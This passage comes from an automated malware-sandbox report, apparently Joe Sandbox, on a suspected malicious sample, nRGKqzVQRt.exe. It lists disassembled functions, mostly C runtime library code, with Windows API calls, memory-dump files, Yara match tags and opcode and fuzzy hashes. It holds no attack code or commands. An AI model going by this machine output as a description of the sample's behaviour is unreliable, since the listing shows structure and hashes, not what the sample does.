                                                  • SetLastError.KERNEL32(00000000,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8,?,00000001,?), ref: 10003E81
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                                  • Instruction ID: cea4d4d1ab0609a38d25ccf127c64f3389598815618148a6298b3cccc824aafb
                                                  • Opcode Fuzzy Hash: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                                  • Instruction Fuzzy Hash: 610124379083A66EF25BC7B49CC964B379AEB0D3F53208329F114410F8EFA29E45A244
                                                  Function 0066FF4B Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,0066FF42,0066E5C6,0066DC00), ref: 0066FF59
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0066FF67
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0066FF80
                                                  • SetLastError.KERNEL32(00000000,0066FF42,0066E5C6,0066DC00), ref: 0066FFD2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: 680a329933b96cb53ae5c265fb9cc4498949d1d82d710ca85a3e381c7e918393
                                                  • Instruction ID: 9e9f53fbad7611e7eb02fbb4108496f5f10a549a6257b920d0db9e474e7e80c2
                                                  • Opcode Fuzzy Hash: 680a329933b96cb53ae5c265fb9cc4498949d1d82d710ca85a3e381c7e918393
                                                  • Instruction Fuzzy Hash: 6101473220D3216FAB792778BC856AB2767DB03379330837EF2149A1E1EF214C01960C
                                                  Function 0041E23E Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free_strpbrk
                                                  • String ID: *?
                                                  • API String ID: 3300345361-2564092906
                                                  • Opcode ID: 1b872839572ce77f52e9475ec3f8f690db5289a5917ecebeda3a0b257d06265e
                                                  • Instruction ID: a122fd9419f898384cf6ba0be5aad0ec39547800dab320595ce715f55366b062
                                                  • Opcode Fuzzy Hash: 1b872839572ce77f52e9475ec3f8f690db5289a5917ecebeda3a0b257d06265e
                                                  • Instruction Fuzzy Hash: BB612E75E002199FDB14CFAAC8815EEFBF5EF48314B14816AEC55E7301D739AE818B94
                                                  Function 0067E4A5 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free_strpbrk
                                                  • String ID: *?
                                                  • API String ID: 3300345361-2564092906
                                                  • Opcode ID: 60f525a42f190a9458013c37ea75fb8dcfa5ef6644f2c9b3e2bdf0b858d844a1
                                                  • Instruction ID: 65f7a6ace0824e042eecc5f0223ce986bf465cfd8f0d72c987a1f9a07f2c3c62
                                                  • Opcode Fuzzy Hash: 60f525a42f190a9458013c37ea75fb8dcfa5ef6644f2c9b3e2bdf0b858d844a1
                                                  • Instruction Fuzzy Hash: A46150B5D002199FDF15DFA8C8815EDFBF6EF5C714B2481AAE819E7300E6329E458B90
                                                  Function 0041675D Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 123COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8kv$C:\Users\user\Desktop\nRGKqzVQRt.exe$h'u
                                                  • API String ID: 0-1048751024
                                                  • Opcode ID: 255b861c4cde4eb3723fb2a95b0f68a5a29e851743693505edb5e3ee1a8514b8
                                                  • Instruction ID: ae20e1325de7d9b0d380bebdbbbe849bcc95121cf4aa11dd91f3eee9ce026df2
                                                  • Opcode Fuzzy Hash: 255b861c4cde4eb3723fb2a95b0f68a5a29e851743693505edb5e3ee1a8514b8
                                                  • Instruction Fuzzy Hash: D141BFB0A01219AFDB11EF9ACC819EFBBB8EF85714B11006BF414A7251D778DA81C768
                                                  Function 10008336 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • C:\Users\user\Desktop\nRGKqzVQRt.exe, xrefs: 1000833B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C:\Users\user\Desktop\nRGKqzVQRt.exe
                                                  • API String ID: 0-3354497341
                                                  • Opcode ID: ddfca3805b10fb0c405c12195d97b130fb222a2330a05fb996068ff6147a541c
                                                  • Instruction ID: d1df9cd49d1a9d965a935ddcfcfd3b9185eaf4079d6f623355f3cc1fa6217373
                                                  • Opcode Fuzzy Hash: ddfca3805b10fb0c405c12195d97b130fb222a2330a05fb996068ff6147a541c
                                                  • Instruction Fuzzy Hash: C821D075A00206BFF710DF61CC8090B779CFF846E47108124FA949215AEB31EF0087A0
                                                  Function 0067EA6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • C:\Users\user\Desktop\nRGKqzVQRt.exe, xrefs: 0067EA6F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C:\Users\user\Desktop\nRGKqzVQRt.exe
                                                  • API String ID: 0-3354497341
                                                  • Opcode ID: 942b44d07ceeb41c0be3006577560e2bad2008f0503f87ddf01a6426efce1dc8
                                                  • Instruction ID: d94908c07f4da3b96922f13ad9a1d6686f5819b6f88a75583043d807ba7303aa
                                                  • Opcode Fuzzy Hash: 942b44d07ceeb41c0be3006577560e2bad2008f0503f87ddf01a6426efce1dc8
                                                  • Instruction Fuzzy Hash: FC21D071600209AFDB20AB75CD81D6B7BAFEF183A4710C168F81D97240EB22EC058BA4
                                                  Function 0044359F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: __calloc_crt
                                                  • String ID: `CE$pCE$EE
                                                  • API String ID: 3494438863-3553073440
                                                  • Opcode ID: 844dbb072adfe617962027c8ad5edc2c1b3f1fee32c52c54c4b45924023f41de
                                                  • Instruction ID: 246a86268ff65e66e8bbb18e1ca13ba6470a59856a14270decd01848c5431892
                                                  • Opcode Fuzzy Hash: 844dbb072adfe617962027c8ad5edc2c1b3f1fee32c52c54c4b45924023f41de
                                                  • Instruction Fuzzy Hash: F9110A713096116BF7248F1DBC5176622D1FB84B2AB55013BF511CB3E5FBB8C982868D
                                                  Function 00410D87 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00410E48,?,?,00438470,00000000,?,00410F73,00000004,InitializeCriticalSectionEx,00429B9C,InitializeCriticalSectionEx,00000000), ref: 00410E17
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID: api-ms-
                                                  • API String ID: 3664257935-2084034818
                                                  • Opcode ID: b02907538fd99b55170e1f1008d4e2625caf0628eb1d99c908a259ed80e5b8af
                                                  • Instruction ID: f93bafddc2c6944db94e1caf77ca7fb938f0b13048c967e4936ca7b24af3ac9f
                                                  • Opcode Fuzzy Hash: b02907538fd99b55170e1f1008d4e2625caf0628eb1d99c908a259ed80e5b8af
                                                  • Instruction Fuzzy Hash: 9611E331B41321ABCB325B69AC01B9E73A4AF02760F150526E901E7380DBB8FDC286DD
                                                  Function 00414CD1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00414CC6,?,?,00414C8E,00000000,7622DF80,?), ref: 00414CE6
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00414CF9
                                                  • FreeLibrary.KERNEL32(00000000,?,?,00414CC6,?,?,00414C8E,00000000,7622DF80,?), ref: 00414D1C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 3717617a3a4dd42a780df557cb31e783c1a43f24c868797946e740d6e1b0b732
                                                  • Instruction ID: e2be2c7a9067ee3b760dcd4954630d509753a7993c03b47d75f7a554283c4f72
                                                  • Opcode Fuzzy Hash: 3717617a3a4dd42a780df557cb31e783c1a43f24c868797946e740d6e1b0b732
                                                  • Instruction Fuzzy Hash: D6F08230601119FBDB219B51ED09BEE7B68EB40752F604065F900A12A0CF788E11DA98
                                                  Function 10005FAA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FBF
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10005FD2
                                                  • FreeLibrary.KERNEL32(00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FF5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                                  • Instruction ID: ce5d81a5a20928f213bfffb098e7a6005668583a74e8757c7f390ca8b74bdc84
                                                  • Opcode Fuzzy Hash: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                                  • Instruction Fuzzy Hash: 1BF01C31904129FBEB06DB91CD0ABEE7AB9EB047D6F1041B4F501A21A4CBB5CE41DB90
                                                  Function 00417023 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 0041702C
                                                    • Part of subcall function 004196E8: RtlFreeHeap.NTDLL(00000000,00000000,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?), ref: 004196FE
                                                    • Part of subcall function 004196E8: GetLastError.KERNEL32(?,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?,?), ref: 00419710
                                                  • _free.LIBCMT ref: 0041703F
                                                  • _free.LIBCMT ref: 00417050
                                                  • _free.LIBCMT ref: 00417061
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID: 8kv
                                                  • API String ID: 776569668-3931507551
                                                  • Opcode ID: 30cbf7fb3445322f5385668cae4fba4876bf89921f2c2bac2e7e205206153011
                                                  • Instruction ID: 3fe777f1b78a63b08a2ef341b4c74d1d5c6aa3709f5bbb988e12ac5a6b696405
                                                  • Opcode Fuzzy Hash: 30cbf7fb3445322f5385668cae4fba4876bf89921f2c2bac2e7e205206153011
                                                  • Instruction Fuzzy Hash: 15E0B6B1901322AF8602BF1ABC114CAFA21AB54734301602FF40012A31CF3D19929F9E
                                                  Function 004181BC Relevance: 7.8, APIs: 5, Instructions: 255COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,7622DF80,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418E28
                                                    • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418EC6
                                                  • _free.LIBCMT ref: 004184A7
                                                  • _free.LIBCMT ref: 004184C0
                                                  • _free.LIBCMT ref: 004184FE
                                                  • _free.LIBCMT ref: 00418507
                                                  • _free.LIBCMT ref: 00418513
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorLast
                                                  • String ID:
                                                  • API String ID: 3291180501-0
                                                  • Opcode ID: 5c7b43d89d65a39910ed5fd65db01eea952a882e3af708f59d2cf6b7f1454f4d
                                                  • Instruction ID: 9616d8a6246681855122babaf8440f4712779bb404b18624a61a89f01e96d866
                                                  • Opcode Fuzzy Hash: 5c7b43d89d65a39910ed5fd65db01eea952a882e3af708f59d2cf6b7f1454f4d
                                                  • Instruction Fuzzy Hash: 69B14975A0161A9BDB24DF15C884AEEB3B5FB08304F5445AEE849A7350EB34AED0CF48
                                                  Function 1000A5DD Relevance: 7.7, APIs: 5, Instructions: 244COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,1000A899,00000000,00000000,00000000,00000001,?,?,?,?,00000001), ref: 1000A680
                                                  • __alloca_probe_16.LIBCMT ref: 1000A736
                                                  • __alloca_probe_16.LIBCMT ref: 1000A7CC
                                                  • __freea.LIBCMT ref: 1000A837
                                                  • __freea.LIBCMT ref: 1000A843
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: __alloca_probe_16__freea$Info
                                                  • String ID:
                                                  • API String ID: 2330168043-0
                                                  • Opcode ID: 8cc199d558b997503fdcee74a17b35d0cfef9a10842a3a6720ec3a40d10b29e0
                                                  • Instruction ID: 1dd90d70d9504398cfa9d6ef4ea6864651e072268de8b4bf5549d7cf43e308ef
                                                  • Opcode Fuzzy Hash: 8cc199d558b997503fdcee74a17b35d0cfef9a10842a3a6720ec3a40d10b29e0
                                                  • Instruction Fuzzy Hash: C081A472D042569BFF11CE648C81ADE7BF5EF0B6D0F158265E904AB148DB369DC1CBA0
                                                  Function 1000AFB7 Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __alloca_probe_16.LIBCMT ref: 1000B03B
                                                  • __alloca_probe_16.LIBCMT ref: 1000B101
                                                  • __freea.LIBCMT ref: 1000B16D
                                                    • Part of subcall function 100079EE: RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                                  • __freea.LIBCMT ref: 1000B176
                                                  • __freea.LIBCMT ref: 1000B199
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1423051803-0
                                                  • Opcode ID: e63f2a8978e00137fdd1d9a780ebd3875915c182c7a46276be8a26015b9944ff
                                                  • Instruction ID: ca0e6193c5ab93552cef367aef9b2c098b98f9a761b18089088d519bce5e91c7
                                                  • Opcode Fuzzy Hash: e63f2a8978e00137fdd1d9a780ebd3875915c182c7a46276be8a26015b9944ff
                                                  • Instruction Fuzzy Hash: 6651C072600616ABFB21CF64CC81EAF37E9EF456D0F624129FD14A7158EB34EC5197A0
                                                  Function 00417D31 Relevance: 7.7, APIs: 5, Instructions: 186COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041A395: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040E15B,?,?,?,004010DD,?,00403497,?,?,?), ref: 0041A3C7
                                                  • _free.LIBCMT ref: 00417E40
                                                  • _free.LIBCMT ref: 00417E57
                                                  • _free.LIBCMT ref: 00417E74
                                                  • _free.LIBCMT ref: 00417E8F
                                                  • _free.LIBCMT ref: 00417EA6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 3033488037-0
                                                  • Opcode ID: 796391581251b77269079763240f90f867541923407a82df9009afead37a043d
                                                  • Instruction ID: b09f1d80b9d524519e6a2af905cbdca403bfb98ecb25127e3a5e28922fcd0f4f
                                                  • Opcode Fuzzy Hash: 796391581251b77269079763240f90f867541923407a82df9009afead37a043d
                                                  • Instruction Fuzzy Hash: CA51A272A04308AFDB21DF2ADC81BEA77F5EF44714B14056EE805D7291E739DD818B98
                                                  Function 00677F98 Relevance: 7.7, APIs: 5, Instructions: 186COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 3033488037-0
                                                  • Opcode ID: bf325a0276ac7524d4f60471fb5fe8747a97fbc829fc97ca04c34618ab33ca25
                                                  • Instruction ID: 0f33de791b01e5c9feb0ec488d5b1005a32b95843d00ed792d5c503c8ca99453
                                                  • Opcode Fuzzy Hash: bf325a0276ac7524d4f60471fb5fe8747a97fbc829fc97ca04c34618ab33ca25
                                                  • Instruction Fuzzy Hash: 6051D371A40205AFDB21DF29CC42AAA77F6EF54720B14856DE80DD7291EB35EE01CB94
                                                  Function 00662BA7 Relevance: 7.6, APIs: 5, Instructions: 113memorywindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualProtect.KERNEL32(?,?,?,?), ref: 00662C4F
                                                  • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00662C64
                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00662C72
                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00662C8D
                                                  • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00662CAC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
                                                  • String ID:
                                                  • API String ID: 2509773233-0
                                                  • Opcode ID: 8ff13bd64c836a37172eabe9342752174e9479ef80da464201f40468a1b6010f
                                                  • Instruction ID: d8978c4616e9092c2ec7bb3602dd71a02537144a498b2b5454925cfb0d1cbe8d
                                                  • Opcode Fuzzy Hash: 8ff13bd64c836a37172eabe9342752174e9479ef80da464201f40468a1b6010f
                                                  • Instruction Fuzzy Hash: 2A311272B00405AFDB149F68DC50FAEB7AAEF48710F4641ADF905EB251CB31AE06CB94
                                                  Function 0043F160 Relevance: 7.6, APIs: 5, Instructions: 94COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0043F182
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0043F1A5
                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0043F226
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0043F247
                                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 0043F261
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: LockitLockit::_std::_$Facet_Registerstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                  • String ID:
                                                  • API String ID: 2929382975-0
                                                  • Opcode ID: 011b66f31ed96c6d7ce0684380522aa60c623a31d8bbda318f5410154e17e4c4
                                                  • Instruction ID: 5c2f1590632ce50086238b0663d6ac00eeb87f434218a5b0a9d45e1460e8e59e
                                                  • Opcode Fuzzy Hash: 011b66f31ed96c6d7ce0684380522aa60c623a31d8bbda318f5410154e17e4c4
                                                  • Instruction Fuzzy Hash: 3031C0B1D00215DFCB14DF55D941BAFB370AB18724F10127FE92267292DB38AD08CB9A
                                                  Function 10002986 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: dllmain_raw$dllmain_crt_dispatch
                                                  • String ID:
                                                  • API String ID: 3136044242-0
                                                  • Opcode ID: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                                  • Instruction ID: 86b98bd5048e9daedf5606c3f96c4c2c05ee8e367bee4de8e4e1682ebb6c2564
                                                  • Opcode Fuzzy Hash: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                                  • Instruction Fuzzy Hash: EA21A476E0526AAFFB32CF55CC41ABF3AA9EB85AD0F014115FC4867258CB309D419BD1
                                                  Function 00441468 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __getptd_noexit.LIBCMT ref: 0044146F
                                                    • Part of subcall function 00444E11: ___set_flsgetvalue.LIBCMT ref: 00444E23
                                                    • Part of subcall function 00444E11: __calloc_crt.LIBCMT ref: 00444E37
                                                  • __calloc_crt.LIBCMT ref: 00441491
                                                  • __get_sys_err_msg.LIBCMT ref: 004414AF
                                                  • _strcpy_s.LIBCMT ref: 004414B7
                                                  • __invoke_watson.LIBCMT ref: 004414CC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: __calloc_crt$___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
                                                  • String ID:
                                                  • API String ID: 27446768-0
                                                  • Opcode ID: 0bcc0e350303ad3649bc9898270f928d7f79292a72bd352e6ab9c7dae69df600
                                                  • Instruction ID: f14487832c4465ef80c755e4f3026394dce4aaa12c0731f30ed0c50e2eba33ac
                                                  • Opcode Fuzzy Hash: 0bcc0e350303ad3649bc9898270f928d7f79292a72bd352e6ab9c7dae69df600
                                                  • Instruction Fuzzy Hash: 80F05032A002202BF72039979C8196B71DCCB8077C711443FF508A7622E56DDCC141ED
                                                  Function 004456E7 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
